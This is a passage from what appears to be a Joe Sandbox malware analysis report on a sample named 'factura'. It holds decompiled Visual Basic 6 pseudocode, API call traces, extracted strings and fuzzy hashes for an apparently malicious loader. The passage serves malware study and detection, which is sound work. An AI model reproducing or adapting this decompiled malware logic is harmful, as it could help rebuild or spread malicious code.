				_push( &_v120);
				_t91 =  &_v36;
				_push(_t91);
				L00401522();
				_push(_t91);
				L00401528();
				L004015F4();
				asm("fcomp qword [0x401340]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t36 == 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_v212 = 1;
				}
				_v188 =  ~_v212;
				_t107 =  &_v36;
				L0040166C();
				_push( &_v120);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_push(5);
				L00401600();
				_t118 = _t117 + 0x18;
				_t99 = _v188;
				if(_t99 != 0) {
					_push(_t107);
					 *_t118 =  *0x401338;
					_t122 =  *0x401330 *  *0x401328;
					if( *0x40c000 != 0) {
						_push( *0x401294);
						_push( *0x401290);
						L00401444();
					} else {
						_t122 = _t122 /  *0x401290;
					}
					asm("fnstsw ax");
					if((_t99 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v216 = _t122;
					_v104 = _v216;
					 *_t118 =  *0x401320;
					L00401516();
					 *_t118 =  *0x401310;
					_v120 =  *0x40130c;
					 *_t118 =  *0x401308;
					_t99 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t107, _t107, _t107, _t99, _t107, _t107);
					asm("fclex");
					_v188 = _t99;
					if(_v188 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x402484);
						_push(_a4);
						_push(_v188);
						L00401654();
						_v220 = _t99;
					}
				}
				asm("wait");
				_push(E00409E31);
				L0040166C();
				L004015E8();
				return _t99;
			}

0x00409aff
0x00409b0e
0x00409b1a
0x00409b22
0x00409b25
0x00409b2c
0x00409b3b
0x00409b44
0x00409b49
0x00409b4e
0x00409b53
0x00409b54
0x00409b5e
0x00409b63
0x00409b64
0x00409b69
0x00409b70
0x00409b76
0x00409b80
0x00409b8e
0x00409b9b
0x00409bb8
0x00409b9d
0x00409b9d
0x00409ba2
0x00409ba7
0x00409bac
0x00409bac
0x00409bc8
0x00409bca
0x00409bda
0x00409bde
0x00409be3
0x00409be7
0x00409bed
0x00409bf1
0x00409bfd
0x00409c05
0x00409c08
0x00409c0a
0x00409c17
0x00409c39
0x00409c19
0x00409c19
0x00409c1b
0x00409c20
0x00409c26
0x00409c2c
0x00409c31
0x00409c31
0x00409c43
0x00409c4b
0x00409c4b
0x00409c50
0x00409c57
0x00409c5e
0x00409c65
0x00409c6c
0x00409c6c
0x00409c70
0x00409c77
0x00409c7e
0x00409c88
0x00409c8c
0x00409c90
0x00409c94
0x00409c98
0x00409c99
0x00409ca1
0x00409ca2
0x00409ca5
0x00409ca6
0x00409cab
0x00409cac
0x00409cb1
0x00409cb6
0x00409cbc
0x00409cbe
0x00409cbf
0x00409ccd
0x00409cc1
0x00409cc1
0x00409cc1
0x00409cdc
0x00409ce3
0x00409ce6
0x00409cee
0x00409cf2
0x00409cf6
0x00409cfa
0x00409cfe
0x00409cff
0x00409d01
0x00409d06
0x00409d09
0x00409d12
0x00409d1e
0x00409d1f
0x00409d28
0x00409d35
0x00409d3f
0x00409d45
0x00409d4b
0x00409d37
0x00409d37
0x00409d37
0x00409d50
0x00409d54
0x0040142c
0x0040142c
0x00409d5a
0x00409d67
0x00409d71
0x00409d7a
0x00409d87
0x00409d91
0x00409d9b
0x00409dab
0x00409db1
0x00409db3
0x00409dc0
0x00409de2
0x00409dc2
0x00409dc2
0x00409dc7
0x00409dcc
0x00409dcf
0x00409dd5
0x00409dda
0x00409dda
0x00409dc0
0x00409de9
0x00409dea
0x00409e23
0x00409e2b
0x00409e30

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409B1A
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409B44
__vbaI4Str.MSVBVM60(00402AA0,?,?,?,?,00401426), ref: 00409B4E
#537.MSVBVM60(00000000,00402AA0,?,?,?,?,00401426), ref: 00409B54
__vbaStrMove.MSVBVM60(00000000,00402AA0,?,?,?,?,00401426), ref: 00409B5E
__vbaStrCmp.MSVBVM60(00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409B69
__vbaFreeStr.MSVBVM60(00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409B80
__vbaNew2.MSVBVM60(004026E4,0040C33C,00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409BA7
__vbaLateMemCallLd.MSVBVM60(?,?,CYtZi0nszoU4nj128,00000000), ref: 00409BDE
__vbaObjVar.MSVBVM60(00000000,?,?,?,00401426), ref: 00409BE7
__vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,?,?,?,00401426), ref: 00409BF1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C2C
__vbaFreeObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C43
__vbaFreeVar.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C4B
#664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00409C99
__vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00409CA6
#581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409CAC
__vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409CB1
__vbaFreeStr.MSVBVM60 ref: 00409CE6
__vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00409D01
_adj_fdiv_m64.MSVBVM60(?,00402AA0,?,?,?,?,00401426), ref: 00409D4B
__vbaFpI4.MSVBVM60(?,?,?,00402AA0,?,?,?,?,00401426), ref: 00409D7A
__vbaHresultCheckObj.MSVBVM60(00000000,00401348,00402484,000002C0), ref: 00409DD5
__vbaFreeStr.MSVBVM60(00409E31,00402AA0,?,?,?,?,00401426), ref: 00409E23
__vbaFreeObj.MSVBVM60(00409E31,00402AA0,?,?,?,?,00401426), ref: 00409E2B

Strings

c, xrefs: 00409C5E
d, xrefs: 00409C77
CYtZi0nszoU4nj128, xrefs: 00409BD2

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$CheckHresult$#537#581#664AddrefCallChkstkCopyLateListMoveNew2_adj_fdiv_m64
String ID: CYtZi0nszoU4nj128$c$d
API String ID: 1323223818-1097554447
Opcode ID: 9614dbe5ba8fc78f88294aacd65c5b76729fed4fb822a5ff126b05c5e3e9a693
Instruction ID: 65f10a347b61fb2c19abb23df9cb3c85e1a65150574fff23945548838faf25c7
Opcode Fuzzy Hash: 9614dbe5ba8fc78f88294aacd65c5b76729fed4fb822a5ff126b05c5e3e9a693
Instruction Fuzzy Hash: 22812C71900208EBDB10EF91DD89BDEB7B8BF04704F1085AAF509B61E1DB795A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004098BB, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E004098BB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				void* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t66;
				signed int _t71;
				char* _t75;
				signed int _t81;
				void* _t83;
				char* _t84;
				signed int _t87;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t113 = _t112 - 0xc;
				 *[fs:0x0] = _t113;
				L00401420();
				_v16 = _t113;
				_v12 = 0x4012f8;
				_v8 = 0;
				_t66 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t110);
				L0040163C();
				L0040163C();
				_push(2);
				_push(_v32);
				L00401558();
				L00401678();
				_push(_t66);
				_push(0x402954);
				L0040167E();
				asm("sbb eax, eax");
				_v84 =  ~( ~( ~_t66));
				L0040166C();
				if(_v84 != 0) {
					_push(1);
					_push(L"KNLE");
					L00401552();
				}
				_v72 = 0x402a74;
				_v80 = 8;
				L004015BE();
				_t71 =  &_v64;
				_push(_t71);
				L0040154C();
				L00401678();
				_push(_t71);
				_push(0);
				L0040167E();
				asm("sbb eax, eax");
				_v84 =  ~( ~_t71 + 1);
				L0040166C();
				L0040164E();
				_t75 = _v84;
				if(_t75 != 0) {
					if( *0x40c33c != 0) {
						_v108 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v108 = 0x40c33c;
					}
					_v84 =  *_v108;
					_t81 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84,  &_v44);
					asm("fclex");
					_v88 = _t81;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4026d4);
						_push(_v84);
						_push(_v88);
						L00401654();
						_v112 = _t81;
					}
					_v92 = _v44;
					_v72 = 1;
					_v80 = 2;
					_t83 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401546();
					_t84 =  &_v48;
					L0040159A();
					_t87 =  *((intOrPtr*)( *_v92 + 0x58))(_v92, _t84, _t84, _t83, _v28, 0x402a7c);
					asm("fclex");
					_v96 = _t87;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402a8c);
						_push(_v92);
						_push(_v96);
						L00401654();
						_v116 = _t87;
					}
					_push( &_v44);
					_t75 =  &_v48;
					_push(_t75);
					_push(2);
					L00401594();
				}
				_push(E00409ADD);
				L004015E8();
				L0040166C();
				L0040166C();
				return _t75;
			}

0x004098be
0x004098cd
0x004098d7
0x004098df
0x004098e2
0x004098e9
0x004098f8
0x00409901
0x0040990e
0x00409913
0x00409915
0x00409918
0x00409922
0x00409927
0x00409928
0x0040992d
0x00409934
0x0040993a
0x00409941
0x0040994c
0x0040994e
0x00409950
0x00409955
0x00409955
0x0040995a
0x00409961
0x0040996e
0x00409973
0x00409976
0x00409977
0x00409981
0x00409986
0x00409987
0x00409989
0x00409990
0x00409995
0x0040999c
0x004099a4
0x004099a9
0x004099af
0x004099bc
0x004099d6
0x004099be
0x004099be
0x004099c3
0x004099c8
0x004099cd
0x004099cd
0x004099e2
0x004099f1
0x004099f4
0x004099f6
0x004099fd
0x00409a16
0x004099ff
0x004099ff
0x00409a01
0x00409a06
0x00409a09
0x00409a0c
0x00409a11
0x00409a11
0x00409a1d
0x00409a20
0x00409a27
0x00409a30
0x00409a31
0x00409a3b
0x00409a3c
0x00409a3d
0x00409a3e
0x00409a47
0x00409a4d
0x00409a51
0x00409a5f
0x00409a62
0x00409a64
0x00409a6b
0x00409a84
0x00409a6d
0x00409a6d
0x00409a6f
0x00409a74
0x00409a77
0x00409a7a
0x00409a7f
0x00409a7f
0x00409a8b
0x00409a8c
0x00409a8f
0x00409a90
0x00409a92
0x00409a97
0x00409a9a
0x00409ac7
0x00409acf
0x00409ad7
0x00409adc

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004098D7
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409901
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040990E
#514.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409918
__vbaStrMove.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409922
__vbaStrCmp.MSVBVM60(00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 0040992D
__vbaFreeStr.MSVBVM60(00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 00409941
#580.MSVBVM60(KNLE,00000001,00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 00409955
__vbaVarDup.MSVBVM60 ref: 0040996E
#667.MSVBVM60(?), ref: 00409977
__vbaStrMove.MSVBVM60(?), ref: 00409981
__vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00409989
__vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 0040999C
__vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 004099A4
__vbaNew2.MSVBVM60(004026E4,0040C33C,00000000,00000000,?), ref: 004099C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000001C,?,?,?,?,00000000,00000000,?), ref: 00409A0C
__vbaChkstk.MSVBVM60(?,?,?,?,00000000,00000000,?), ref: 00409A31
__vbaCastObj.MSVBVM60(?,00402A7C,?,?,?,?,00000000,00000000,?), ref: 00409A47
__vbaObjSet.MSVBVM60(00000000,00000000,?,00402A7C,?,?,?,?,00000000,00000000,?), ref: 00409A51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402A8C,00000058,?,?,?,?,00000000,00000000,?), ref: 00409A7A
__vbaFreeObjList.MSVBVM60(00000002,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00409A92
__vbaFreeObj.MSVBVM60(00409ADD,00000000,00000000,?), ref: 00409AC7

Strings

ABC, xrefs: 00409906
KNLE, xrefs: 00409950
tmp, xrefs: 0040995A

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultMove$#514#580#667CastListNew2
String ID: ABC$KNLE$tmp
API String ID: 1916041330-2148770640
Opcode ID: a85c4000936b98f3f8b558e75a1f703c7eef4482431bf3278b2ef6f7d5fdba52
Instruction ID: f5d7ee50bda3a6f9f62531cf6a49d83dbd315f34c405ac98cf4d3aadfb619591
Opcode Fuzzy Hash: a85c4000936b98f3f8b558e75a1f703c7eef4482431bf3278b2ef6f7d5fdba52
Instruction Fuzzy Hash: 4551E871A40249ABCB10EFE5CC46BEEBBB4AF14704F10452AE406BB1E1DBB95945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004089D8, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E004089D8(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0) {
				intOrPtr _v8;
				long long* _v12;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v112;
				char* _v120;
				char _v128;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				void* _v180;
				signed int _v184;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				short _t73;
				char* _t83;
				signed int _t91;
				void* _t99;
				long long* _t115;
				long long* _t116;
				short _t117;
				long long _t121;

				_t121 = __fp0;
				_t99 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				L00401420();
				_v12 = _t115;
				_v8 = 0x401238;
				_push( &_v44);
				L00401606();
				_push( &_v44);
				asm("fld1");
				_push(__ecx);
				_push(__ecx);
				 *_t115 = __fp0;
				_push(0x4028c8);
				_push( &_v60);
				L0040160C();
				_push( &_v76);
				L00401606();
				_v120 = 1;
				_v128 = 2;
				_push( &_v60);
				_push( &_v76);
				_push( &_v128);
				_t73 =  &_v92;
				_push(_t73);
				L0040162A();
				_push(_t73);
				L00401612();
				_v180 = _t73;
				_push( &_v92);
				_push( &_v60);
				_push( &_v76);
				_push( &_v44);
				_push(4);
				L00401600();
				_t116 = _t115 + 0x14;
				_t117 = _v180;
				if(_t117 != 0) {
					_v120 = L"Rumorer8";
					_v128 = 8;
					_v152 = 0x35b2bc;
					_v160 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"iWttTKulK1qrU139");
					_push(_v28);
					L004015FA();
					_t116 = _t116 + 0x2c;
				}
				_v36 = 1;
				_v44 = 2;
				_push( &_v44);
				asm("fld1");
				_push(_t99);
				_push(_t99);
				_v92 = _t121;
				asm("fld1");
				_push(_t99);
				_push(_t99);
				 *_t116 = _t121;
				asm("fld1");
				_push(_t99);
				_push(_t99);
				 *_t116 = _t121;
				_push(_t99);
				_push(_t99);
				 *_t116 =  *0x401230;
				L004015EE();
				L004015F4();
				asm("fcomp qword [0x401228]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t117 == 0) {
					_v192 = _v192 & 0x00000000;
				} else {
					_v192 = 1;
				}
				_v180 =  ~_v192;
				L0040164E();
				if(_v180 != 0) {
					if( *0x40c33c != 0) {
						_v196 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v196 = 0x40c33c;
					}
					_v180 =  *_v196;
					_v136 = L"REINHOLTS";
					_v144 = 8;
					_v120 = 0x20;
					_v128 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t91 =  *((intOrPtr*)( *_v180 + 0x38))(_v180, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v184 = _t91;
					if(_v184 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x4026d4);
						_push(_v180);
						_push(_v184);
						L00401654();
						_v200 = _t91;
					}
					_push( &_v44);
					_push( &_v112);
					L00401660();
					_push( &_v112);
					_push( &_v24);
					L00401666();
					L0040164E();
				}
				asm("wait");
				_push(E00408C98);
				_t83 =  &_v24;
				_push(_t83);
				_push(0);
				L00401618();
				L004015E8();
				return _t83;
			}

0x004089d8
0x004089d8
0x004089db
0x004089dc
0x004089dd
0x004089e8
0x004089e9
0x004089f5
0x004089fd
0x00408a00
0x00408a0a
0x00408a0b
0x00408a13
0x00408a14
0x00408a16
0x00408a17
0x00408a18
0x00408a1b
0x00408a23
0x00408a24
0x00408a2c
0x00408a2d
0x00408a32
0x00408a39
0x00408a43
0x00408a47
0x00408a4b
0x00408a4c
0x00408a4f
0x00408a50
0x00408a55
0x00408a56
0x00408a5b
0x00408a65
0x00408a69
0x00408a6d
0x00408a71
0x00408a72
0x00408a74
0x00408a79
0x00408a83
0x00408a85
0x00408a87
0x00408a8e
0x00408a95
0x00408a9f
0x00408aa9
0x00408aac
0x00408ab6
0x00408ab7
0x00408ab8
0x00408ab9
0x00408aba
0x00408abd
0x00408aca
0x00408acb
0x00408acc
0x00408acd
0x00408ace
0x00408ad0
0x00408ad5
0x00408ad8
0x00408add
0x00408add
0x00408ae0
0x00408ae7
0x00408af1
0x00408af2
0x00408af4
0x00408af5
0x00408af6
0x00408af9
0x00408afb
0x00408afc
0x00408afd
0x00408b00
0x00408b02
0x00408b03
0x00408b04
0x00408b0d
0x00408b0e
0x00408b0f
0x00408b12
0x00408b17
0x00408b1c
0x00408b22
0x00408b24
0x00408b25
0x00408b33
0x00408b27
0x00408b27
0x00408b27
0x00408b42
0x00408b4c
0x00408b5a
0x00408b67
0x00408b84
0x00408b69
0x00408b69
0x00408b6e
0x00408b73
0x00408b78
0x00408b78
0x00408b96
0x00408b9c
0x00408ba6
0x00408bb0
0x00408bb7
0x00408bc5
0x00408bd2
0x00408bd3
0x00408bd4
0x00408bd5
0x00408bd9
0x00408be3
0x00408be4
0x00408be5
0x00408be6
0x00408bf5
0x00408bf8
0x00408bfa
0x00408c07
0x00408c29
0x00408c09
0x00408c09
0x00408c0b
0x00408c10
0x00408c16
0x00408c1c
0x00408c21
0x00408c21
0x00408c33
0x00408c37
0x00408c38
0x00408c40
0x00408c44
0x00408c45
0x00408c4d
0x00408c4d
0x00408c52
0x00408c53
0x00408c84
0x00408c87
0x00408c88
0x00408c8a
0x00408c92
0x00408c97

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004089F5
#610.MSVBVM60(?,?,?,?,?,00401426), ref: 00408A0B
#661.MSVBVM60(?,004028C8,?,?,?,?,?,?,?,?,00401426), ref: 00408A24
#610.MSVBVM60(?,?,004028C8,?,?,?,?,?,?,?,?,00401426), ref: 00408A2D
__vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00408A50
__vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00408A56
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00408A74
__vbaChkstk.MSVBVM60 ref: 00408AAC
__vbaChkstk.MSVBVM60 ref: 00408ABD
__vbaLateMemCall.MSVBVM60(?,iWttTKulK1qrU139,00000002), ref: 00408AD8
#673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408B12
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408B17
__vbaFreeVar.MSVBVM60 ref: 00408B4C
__vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 00408B73
__vbaChkstk.MSVBVM60(00000002), ref: 00408BC5
__vbaChkstk.MSVBVM60(00000002), ref: 00408BD9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000038), ref: 00408C1C
__vbaVar2Vec.MSVBVM60(?,00000002), ref: 00408C38
__vbaAryMove.MSVBVM60(?,?,?,00000002), ref: 00408C45
__vbaFreeVar.MSVBVM60(?,?,?,00000002), ref: 00408C4D

Strings

REINHOLTS, xrefs: 00408B9C
, xrefs: 00408BB0
Rumorer8, xrefs: 00408A87
iWttTKulK1qrU139, xrefs: 00408AD0

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Chkstk$Free$#610$#661#673CallCheckHresultLateListMoveNew2Var2
String ID: $REINHOLTS$Rumorer8$iWttTKulK1qrU139
API String ID: 718425485-844045677
Opcode ID: 3f6b65ca790feb2b03a6d06964ea2b0c2595d5921232dd65a39c9c4915ef72e0
Instruction ID: 880f4101add5cb4b96713ced809c00900b9153bcdd2cbeb6c8218808e7917747
Opcode Fuzzy Hash: 3f6b65ca790feb2b03a6d06964ea2b0c2595d5921232dd65a39c9c4915ef72e0
Instruction Fuzzy Hash: 67715BB1800208EBDB11EF91CD46BDEB7B9BF08704F0446AEF544B7191DBB95A848F69

Uniqueness

Uniqueness Score: -1.00%

Function 00409485, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00409485(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v28;
				char _v32;
				char _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				short _v72;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _t102;
				signed int _t107;
				char* _t112;
				signed int _t113;
				signed int* _t116;
				signed int _t122;
				char* _t126;
				signed int _t129;
				intOrPtr _t146;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t146;
				_push(0x5c);
				L00401420();
				_v12 = _t146;
				_v8 = 0x4012c8;
				L0040163C();
				if( *0x40c33c != 0) {
					_v84 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v84 = 0x40c33c;
				}
				_v56 =  *_v84;
				_t102 =  *((intOrPtr*)( *_v56 + 0x4c))(_v56,  &_v28);
				asm("fclex");
				_v60 = _t102;
				if(_v60 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x4026d4);
					_push(_v56);
					_push(_v60);
					L00401654();
					_v88 = _t102;
				}
				_v64 = _v28;
				_t107 =  *((intOrPtr*)( *_v64 + 0x20))(_v64,  &_v52);
				asm("fclex");
				_v68 = _t107;
				if(_v68 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x4029f0);
					_push(_v64);
					_push(_v68);
					L00401654();
					_v92 = _t107;
				}
				_v72 =  ~(0 | _v52 != 0x00000000);
				L004015E8();
				if(_v72 != 0) {
					_t122 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v28);
					asm("fclex");
					_v56 = _t122;
					if(_v56 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x402484);
						_push(_a4);
						_push(_v56);
						L00401654();
						_v96 = _t122;
					}
					if( *0x40c33c != 0) {
						_v100 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v100 = 0x40c33c;
					}
					_v60 =  *_v100;
					_v80 = _v28;
					_v28 = _v28 & 0x00000000;
					_t126 =  &_v32;
					L0040159A();
					_t129 =  *((intOrPtr*)( *_v60 + 0x40))(_v60, _t126, _t126, _v80, L"Costards1");
					asm("fclex");
					_v64 = _t129;
					if(_v64 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4026d4);
						_push(_v60);
						_push(_v64);
						L00401654();
						_v104 = _t129;
					}
					L004015E8();
				}
				_push(0x889);
				_t112 =  &_v48;
				_push(_t112);
				L00401588();
				_push(_t112);
				L0040158E();
				_v56 =  ~(0 | _t112 != 0x0000ffff);
				L0040164E();
				_t113 = _v56;
				if(_t113 != 0) {
					if( *0x40c33c != 0) {
						_v108 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v108 = 0x40c33c;
					}
					_v56 =  *_v108;
					_t116 =  &_v28;
					L00401582();
					_t113 =  *((intOrPtr*)( *_v56 + 0x10))(_v56, _t116, _t116, _a4);
					asm("fclex");
					_v60 = _t113;
					if(_v60 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4026d4);
						_push(_v56);
						_push(_v60);
						L00401654();
						_v112 = _t113;
					}
					L004015E8();
				}
				_push(E0040970C);
				L0040166C();
				return _t113;
			}

0x0040948a
0x00409495
0x00409496
0x0040949d
0x004094a0
0x004094a8
0x004094ab
0x004094b8
0x004094c4
0x004094de
0x004094c6
0x004094c6
0x004094cb
0x004094d0
0x004094d5
0x004094d5
0x004094ea
0x004094f9
0x004094fc
0x004094fe
0x00409505
0x0040951e
0x00409507
0x00409507
0x00409509
0x0040950e
0x00409511
0x00409514
0x00409519
0x00409519
0x00409525
0x00409534
0x00409537
0x00409539
0x00409540
0x00409559
0x00409542
0x00409542
0x00409544
0x00409549
0x0040954c
0x0040954f
0x00409554
0x00409554
0x00409568
0x0040956f
0x0040957a
0x0040958c
0x00409592
0x00409594
0x0040959b
0x004095b7
0x0040959d
0x0040959d
0x004095a2
0x004095a7
0x004095aa
0x004095ad
0x004095b2
0x004095b2
0x004095c2
0x004095dc
0x004095c4
0x004095c4
0x004095c9
0x004095ce
0x004095d3
0x004095d3
0x004095e8
0x004095ee
0x004095f1
0x004095fd
0x00409601
0x0040960f
0x00409612
0x00409614
0x0040961b
0x00409634
0x0040961d
0x0040961d
0x0040961f
0x00409624
0x00409627
0x0040962a
0x0040962f
0x0040962f
0x0040963b
0x0040963b
0x00409640
0x00409645
0x00409648
0x00409649
0x0040964e
0x0040964f
0x0040965f
0x00409666
0x0040966b
0x00409671
0x0040967a
0x00409694
0x0040967c
0x0040967c
0x00409681
0x00409686
0x0040968b
0x0040968b
0x004096a0
0x004096a6
0x004096aa
0x004096b8
0x004096bb
0x004096bd
0x004096c4
0x004096dd
0x004096c6
0x004096c6
0x004096c8
0x004096cd
0x004096d0
0x004096d3
0x004096d8
0x004096d8
0x004096e4
0x004096e4
0x004096e9
0x00409706
0x0040970b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004094A0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 004094B8
__vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 004094D0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000004C), ref: 00409514
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F0,00000020), ref: 0040954F
__vbaFreeObj.MSVBVM60(00000000,?,004029F0,00000020), ref: 0040956F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402484,00000160), ref: 004095AD
__vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 004095CE
__vbaObjSet.MSVBVM60(?,?,Costards1), ref: 00409601
